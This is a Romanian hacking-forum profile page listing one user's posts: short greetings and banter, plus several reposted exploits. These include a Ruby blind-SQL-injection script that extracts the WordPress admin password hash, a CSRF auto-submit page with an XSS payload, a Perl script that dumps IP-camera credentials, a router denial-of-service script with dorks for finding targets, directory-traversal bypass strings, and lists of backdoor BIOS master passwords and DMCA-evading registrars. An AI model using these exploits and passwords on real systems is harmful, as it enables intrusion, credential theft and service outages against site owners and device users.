Jump to content

Gonzalez

Active Members
 View Profile  See their activity

  • Posts

    1576

  • Joined

  • Last visited

  • Days Won

    9

 Content Type 

Everything posted by Gonzalez

  1. Gonzalez

    Salut RST

    Gonzalez replied to StarAndy's topic in Bine ai venit

    Bun venit pe RST. -Gonzalez
  2. Gonzalez
    Mie nu-mi merge cum trebuie forumul, ce ma fac? ))) -Gonzalez
  3. Gonzalez
    Bun venit! -Gonzalez
  4. Gonzalez
    # Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites # Exploit Author: Esac # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 # Official site: http://www.clip-share.com # Software License: Commercial. #all versions are vulnerable: #Last Checked: 27 March 2013 # Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) ============================================================================================== vuln file : gvideos.php , param : gid Poc : http://server/mavideo/gvideos.php?gid=1 [Blind] #to exlploit this poc , must group to be added previously with some videos publics Real exploitation : http://server/mavideo/gvideos.php?gid=1 AND 1=1 ==> return normal page http://server/mavideo/gvideos.php?gid=1 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : channel_detail.php , param : chid Poc : http://server/mavideo/channel_detail.php?chid=4 [Blind] Real exploitation : http://server/mavideo/channel_detail.php?chid=4 AND 1=1 ==> return normal page http://server/mavideo/channel_detail.php?chid=4 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uprofile.php , param : UID Poc : http://server/mavideo/uprofile.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uprofile.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uprofile.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufavour.php , param : UID Poc : http://server/mavideo/ufavour.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufavour.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufavour.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufriends.php , param : UID Poc : http://server/mavideo/ufriends.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufriends.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufriends.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uplaylist.php , param : UID Poc : http://server/mavideo/uplaylist.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uplaylist.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uplaylist.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ugroups.php , param : UID Poc : http://server/mavideo/ugroups.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ugroups.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ugroups.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- PwnEd. Tested version: Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ~ Game Over ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz : White Tarbouch Team & Cobra & Dami ==> Made In Moroco <== ./Esac Source: Exploit-DB
  5. Gonzalez
    Frumos articol. Clientul roman vrea sa faci gratis, sau sa il si platesti in timp ce faci proiectul. -Gonzalez
  6. Gonzalez
    Bun venit! Dar e cu limbajul tau? -Gonzalez
  7. Gonzalez

    Salut!

    Gonzalez replied to varlamdima's topic in Bine ai venit

    Bun venit pe RST. -Gonzalez
  8. Gonzalez
    Bravo lui, cred ca e foarte frumos sa fi milionar la varsta lui. -Gonzalez
  9. Gonzalez
    Doar la mine e asa? Dupa parerea mea ar trebui sa fie in mijloc. Oricum a-ti facut o treaba de nota 10, cu blog si cu homepage-ul. Bravo si felicitari. -Gonzalez
  10. Gonzalez
    Corect spus. -Gonzalez
  11. Gonzalez
    Felicitari. -Gonzalez
  12. Gonzalez
    2005 - vremuri bune. -Gonzalez
  13. Gonzalez

    Salut

    Gonzalez replied to cry4ty's topic in Off-topic

    Baietii au drepate, mai bine te pui sa inveti programare sau altceva ce iti place, in programare salarul e bun. Mai bine lasi hack-ul pentru altcineva. Eu cel putin asa as proceda daca as fi la inceput de drum. -Gonzalez
  14. Gonzalez
    Curve, masini si coca. -Gonzalez
  15. Gonzalez
    # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection # Google Dork: inurl:wp-content/plugins/faqs-manager # Date: 21.03.2013 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog) # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc= h (cli) ############## # Description: ############## # The "order" and "orderby" parameter is vulnerable for SQL Injection # Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din= ic_faq&orderby=3D<sqli> # PoC take some time to finish (15min on my Testsystem). # I could speed it up with Multithreading but I'm to lazy right now #### Vulnerable code part (wp_list_table.php) #############################= ################################### # # function prepare_items() { # $this->_column_headers =3D array($this->_columns, $this->_hidden_columns= , $this->_sortable_columns); # $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC"; # $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= ']} {$sort_order}" : false; # # global $wpdb; # if (is_array($this->_sql)) { # if ($orderby_column =3D=3D false) { # $data =3D $this->_sql; # } else { # $data =3D $this->_sql; # usort($data, array(&$this, 'usort_reorder')); # } # } else { # $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= ); # } ###########################################################################= ##################################### ################################# #### Blind SQL Injection PoC #### ################################# require "net/http" require "uri" $target =3D "" # EDIT ME # $cookie =3D "" # EDIT ME # authenticated user session # Example: #$target =3D "http://127.0.0.1:9001/wordpress/" #$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405= 45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se= ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= =3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau= er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs= ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5= d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91= 694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= =3D1" if $target.eql?("") or $cookie.eql?("") puts "\n[!]\tPlease set $target and $cookie variable\n" raise end $chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a $hash =3D "$P$" $i =3D 0 # chars index $j =3D 4 # hash index def sqli_send() sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$= j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= (SELECT table_name FROM information_schema.tables)END) --") uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby= =3D#{sqli}") http =3D Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stderr) request =3D Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= rv:19.0) Gecko/20100101 Firefox/19.0" request["Cookie"] =3D $cookie resp =3D http.request(request) if( resp.code !=3D "200" ) puts "something is wrong response =3D #{resp.code}" raise end # In WordPress default settings there will no SQL error displayed # but when an error apperes we don't get any result. # The PoC search for "No record found" and suppose there was an error return resp.body().match(/No record found/)=20 end def print_status() output =3D "HASH: #{$hash} try #{$chars[$i]}" print "\b"*output.length + output end while( $hash.length < 34 ) if( !sqli_send() ) $hash +=3D $chars[$i] $j +=3D 1 $i =3D 0 else $i +=3D 1 end print_status() end puts "\n[+]\thave a nice day \n"
  16. Gonzalez
    <html> <!-- # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS # Google Dork: inurl:wp-content/plugins/faqs-manager # Date: 21.03.2013 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog) # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) ############## # Description: ############## # IndiaNIC FAQ Settings Page is vulnerable for CSRF. # The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter. # The Captcha value can be read from captcha parameter (hidden field) # ################################### #### Part of Ask Question form #### ################################### <form action="" method="POST" name="iNICfaqsAskForm_1"> <input type="hidden" value="1" name="group_id"> <input type="hidden" value="1" name="from_user"> <input type="hidden" value="inic_faq_questions" name="action"> <input type="hidden" value="5540" name="captcha"> <=================== We don't need the captcha Image when we have this xD #################################################################### #### Request from Ask Question area (XSS in question parameter) #### #################################################################### POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1:9001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:9001/wordpress/?p=11 Content-Length: 143 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560 # When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute. ####################################################################### --> <title> ##################################################### ############## IndiaNIC FAQ 1.0 CSRF ################ ##################################################### </title> <body> <!-- replace "127.0.0.1:9001/wordpress" --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="inic_faq_settings" /> <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" /> <input type="hidden" name="capture_email" value="1" /> <input type="hidden" name="notify_when_answered" value="1" /> <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> <input type="hidden" name="custom_js" value="alert(1234)" /> </form> <script>document.forms[0].submit();</script> </body> </html>
  17. Gonzalez
    #!/usr/bin/perl # # [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit # Author: Todor Donev # Email: todor.donev at gmail dot com # Type: Hardware # # Thanks to Tsvetelina Emirska the best friend in my life # and all my other friends for the help and support which # gives me. Kind regards to all of you, who read my lil' # exploits. # Bulgaria, Sofia # 03.2013 # # Shodanhq r0x 4 teh lulz!! # http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz # # Another bug, hint: you can edit this code and add some lines for remote change the password. ##### use LWP::Simple; if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); } if ($type eq "-d") { my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n"); print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n"; print " [!] Exploiting: $t\n"; if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) { $result .= " [o] User: $1\n"; }else{die(" Try another exploit, $!");} if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){ $result .= " [o] Password: $1\n"; }else{die("Try another exploit or restart the exploit\n");} sleep(1); print " [\\m/] BINGO!!!\n\a".$result; } sub usg(){ print " [!] usg: perl $0 [-r or -d] <victim:port>\n"; print " [!] -d: disclosure password option\n"; print " [!] exp: perl $0 -d 127.0.0.1 \n"; exit; }
  18. Gonzalez
    [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1 =============================================================================== Author: Janek Vind "waraxe" Date: 19. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-98.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OpenCart is a turn-key ready "out of the box" shopping cart solution. You simply install, select your template, add products and your ready to start accepting orders. http://www.opencart.com/ Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too. ############################################################################### 1. Directory Traversal Vulnerabilities in "filemanager.php" ############################################################################### Reason: insufficient sanitization of user-supplied data Attack vectors: 1. user-supplied POST parameters "directory", "name", "path", "from", "to" Preconditions: 1. Logged in as admin with filemanager access privileges Script "filemanager.php" offers for OpenCart admins various file related services: directory listing and creation, image file listing, file copy/move/unlink, upload, image resize. By the design OpenCart admin can manage files and directories only inside specific subdirectory "image/data/". It means, that even if you have OpenCart admin privileges, you still are not suppose to get access to the files and directories below "image/data/". So far, so good. But what about directory traversal? Let's have a look at the source code. PHP script "admin/controller/common/filemanager.php" line 66: ------------------------[ source code start ]---------------------------------- public function directory() { $json = array(); if (isset($this->request->post['directory'])) { $directories = glob(rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', $this->request->post['directory']), '/') . '/*', GLOB_ONLYDIR); if ($directories) { $i = 0; foreach ($directories as $directory) { $json[$i]['data'] = basename($directory); $json[$i]['attributes']['directory'] = utf8_substr($directory, strlen(DIR_IMAGE . 'data/')); ... $this->response->setOutput(json_encode($json)); ------------------------[ source code end ]------------------------------------ We can see, that directory traversal is prevented by removing "../" substrings from user submitted parameters. At first look this seems to be secure enough - if we can't use "../", then directory traversal is impossible, right? Deeper analysis shows couple of shortcomings in specific filtering method. First problem - if OpenCart is hosted on Windows platform, then it's possible to use "..\" substring for directory traversal. Test (parameter "token" must be valid): -------------------------[ test code start ]----------------------------------- <html><body><center> <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post"> <input type="hidden" name="directory" value="..\..\..\"> <input type="submit" value="Test"> </form> </center></body></html> --------------------------[ test code end ]------------------------------------ Server response is in JSON format and contains listing of subdirectories outside of OpenCart main directory. Second problem - filtering with "str_replace" can be tricked by using custom strings. If we use "..././" substring, then after filtering in becomes "../". So it appears, that implemented anti-traversal code is ineffective and can be bypassed. Test (parameter "token" must be valid): -------------------------[ test code start ]----------------------------------- <html><body><center> <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post"> <input type="hidden" name="directory" value="..././..././..././..././"> <input type="submit" value="Test"> </form> </center></body></html> --------------------------[ test code end ]------------------------------------ Server response is exactly same as in previous test - information about directory structure outside of OpenCart main directory has been disclosed. PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code. Most of the public functions in "filemanager.php" are affected by directory traversal vulnerability: public function directory() -> listing of subdirectories public function files() -> listing of image files public function create() -> creation of new directories public function delete() -> deletion of arbitrary files and directories public function move() -> renaming of files or directories public function copy() -> copying of files or directories public function rename() -> renaming of files or directories public function upload() -> uploading of image or flash files Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------
  19. Gonzalez
    Sorry I forgot to write headers in previous mail. # Exploit Title: [possible ways to exploit CVE-2012-1663( GNUTLS-3.0.13)] # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: [Mar 20, 2013] # Exploit Author: [Shawn the R0ck] # Vendor Homepage: [http://www.gnutls.org/] # Software Link: [download link if available] # Version: [<= 3.0.13] # Tested on: [GNU/Linux] # CVE : [CVE-2012-1663] PoC: http://www.exploit-db.com/sploits/24865.tar.bz2 I'm glad to share this to you guys. The test code was attached. You also could find them here: https://github.com/citypw/arsenal-4-sec-testing/tree/master/libgnutls/CVE-2012-1663 CVE-2013-1663[1] is a possible remote DOS attack issue. This issue has been fixed[2] in >=GNUTLS-3.0.14. I hacked on it for hours and figure out a few prerequisites could make it vulnerable: ============================= REQUIRED: - prior to GNUTLS 3.0.14 - crafted certificate ============================= Attacking SCENES - a client import a crafted cert file for sending req to server( CA?) - a "server" import a crafted cert file for sending req to other server( CA?) ---> With high frequency uses above manipulations Stand on the client side, the attacker should try to construct a crafted certificate for triggering the below function fails: ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0); if (ret < 0) { gnutls_pubkey_deinit(pcert->pubkey); /* pcert->pubkey should be NULL now */ ret = gnutls_assert_val(ret); goto cleanup; } I made up two crafted cert files( client.pem, client2.pem) seems would trigger the double free issue in client's side. Warning: Don't try it on your host machine because it would cost too much memory then makes your machine very slow. shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509 processing server set to null? Server ready. Listening to port '5556'. shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh ................ ................. ................... Another terminal: killall client Test platform: Slackware 13.37 + GNUTLS-3.0.13 [1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1663 [2] Upstream fix http://git.savannah.gnu.org/gitweb/?p=gnutls.git;a=commitdiff;h=9c62f4feb2bdd6fbbb06eb0c60bfdea80d21bbb8 -- GNU powered it... GPL protect it... God blessing it... regards Shawn
  20. Gonzalez
    ?#!/usr/local/bin/perl # # # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit # # # Vendor: TP-LINK Technologies Co., Ltd. # Product web page: http://www.tp-link.us # # Affected version: # # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) # - Hardware version: WR740N v4 00000000 (v4.23) # - Model No. TL-WR740N / TL-WR740ND # # Summary: The TL-WR740N is a combined wired/wireless network connection # device integrated with internet-sharing router and 4-port switch. The # wireless N Router is 802.11b&g compatible based on 802.11n technology # and gives you 802.11n performance up to 150Mbps at an even more affordable # price. Bordering on 11n and surpassing 11g speed enables high bandwidth # consuming applications like video streaming to be more fluid. # # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a # remote denial of service vulnerability when processing a HTTP request. This # issue occurs when the web server (httpd) fails to handle a HTTP GET request # over a given default TCP port 80. Sending a sequence of three dots (...) to # the router will crash its httpd service denying the legitimate users access # to the admin control panel management interface. To bring back the http srv # and the admin UI, a user must physically reboot the router. # # # ============================== Playground: ============================== # # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" # # # nmap -sV 192.168.0.1 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # Not shown: 999 closed ports # PORT STATE SERVICE VERSION # 80/tcp open http TP-LINK WR740N WAP http config # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # Service Info: Device: WAP # # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds # # -------------------------------------------------------------------------- # Changed Probe Directive in nmap-service-probes file [4 d range]: # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n| # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n| # -------------------------------------------------------------------------- # # # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a" # # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480 # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0 # # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%) # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00 # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96 # Nping done: 1 IP address pinged in 1.12 seconds # # -------------------------------------------------------------------------- # # # nmap -Pn 192.168.0.1 -p80 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # PORT STATE SERVICE # 80/tcp closed http # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds # # ============================= !Playground =============================== # # # Tested on: Router Webserver # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Copyleft (c) 2013, Zero Science Lab # Macedonian Information Security Research And Development Laboratory # http://www.zeroscience.mk # # # Advisory ID: ZSL-2013-5135 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php # # # 17.03.2013 # use IO::Socket; $ip="$ARGV[0]"; $port="$ARGV[1]"; print "\n\n\x20"."\x1f"x42 ."\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1f TP-Link TL-WR740N httpd DoS Exploit \x1f\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n"; print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n"; print "\x20" ."\x1f"x42 ."\n"; print "\x20\x4" ."\x20"x40 ."\x4\n"; print "\x20" ."\x1e" x 42 ."\n"; if($#ARGV<1) { print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n"; exit(); } $socket=IO::Socket::INET->new( Proto => "tcp", PeerAddr => $ip, PeerPort => $port ); $ta4ke="\x47\x45\x54\x20". "\x2f\x2e\x2e\x2e". "\x20\x48\x54\x54". "\x50\x2f\x31\x2e". "\x31\x0d\x0a\x0d". "\x0a"; print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2; print $socket "$ta4ke"; sleep 5; close $socket; print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2; print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2; system("nmap -Pn $ip -p $port"); print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2; system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008"); sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1; # Codename: Threetwoees
  21. Gonzalez
    This post would contain a list of domain registrars that are offshore.By 'offshore' i mean they won't share your data to 3rd parties like USA companies and won't suspend domain based on DMCA. Here we go http://prq.se/ -Offer Anonymous Domain Registration (Based in Sweden) http://www.binero.se/ -PirateBay.se Domain registar http://netart-registrar.com/ - torrentz.eu domain registrar http://www.webnames.ru -Good registrar for .su and .ws Remember:If you chose a .com , .net , .org you will still be subjected to US law.This means a court order to verisign and you lost your domain. Some Offshore domain tld : .ws , .su
  22. Gonzalez

    Carcasa

    Gonzalez replied to Cor3Quad's topic in Off-topic

    Arata fain, bravo. Mie imi place. -Gonzalez
  23. Gonzalez
    Eminem - Stan (Long Version) ft. Dido -Gonzalez
  24. Gonzalez
    http://www.askvg.com/how-to-reset-remove-bypass-a-bios-or-cmos-password/ BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent PC from booting. But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally. But there is no need to worry. There are many known ways to reset / remove / bypass the password: By removing CMOS battery By using motherboard jumper By using MS DOS command By using software By using Backdoor BIOS password Now I'll try to explain each method one by one: DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk. By Removing CMOS Battery: Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings. If it fails, then try to remove the battery for at least one hour. By Using Motherboard Jumper: Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery. Most of the manufacturer label the jumper as CLR, CLEAR, CLEAR CMOS, etc. When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either left or right pin. What you need to do, is remove the jumper and join the center pin to the opposite pin. e.g. if the jumper joins center pin to left pin, then remove it and join center pin to right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to left pin. Make sure to turn the PC off before opening the cabinet and resetting the jumper. By Using MS DOS Command: This method works only if you have access to the system when its turned on because this method requires MS DOS. Open Command Prompt from Programs menu and provide following commands one bye one: debug o 70 2E o 71 FF quit NOTE: The first character in the above commands is English alphabet "o" and not the number 0. After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password. If you are curious to know how it works? then let me explain the above commands: In this method we are using the Debug tool of MS DOS. The "o" character present at first in these commands, outputs the values to IO ports. The number 70 and 71 are port numbers which are used to access CMOS memory. By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password. By Using Software: There are a few software which can also reset CMOS settings or BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS DOS or MS Windows: CmosPwd KillCMOS By Using Backdoor BIOS Password: Some BIOS manufacturer put a backdoor password in BIOS which always works irrespective of what password you have set in BIOS. Its a master password which is used for testing and troubleshooting purposes. AMI BIOS Passwords: A.M.I. AAAMMMIII AMI?SW AMI_SW AMI BIOS CONDO HEWITT RAND LKWPETER MI Oder PASSWORD AWARD BIOS Passwords: 01322222 589589 589721 595595 598598 ALFAROME ALLy aLLy aLLY ALLY aPAf _award award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC PHOENIX BIOS Passwords: BIOS CMOS phoenix PHOENIX Misc Common Passwords: ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj Other Manufacturer BIOS Passwords: Biostar - Biostar Compaq - Compaq Dell - Dell Enox - xo11nE Epox - central Freetech - Posterie IWill - iwill Jetway - spooml Packard Bell - bell9 QDI - QDI Siemens - SKY_FOX TMC - BIGO Toshiba - Toshiba VOBIS & IBM - merlin NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.
  25. Gonzalez
    Bine ca sunt infectate PC-urile americanilor, unde is multi bani. -Gonzalez
×
×
  • Create New...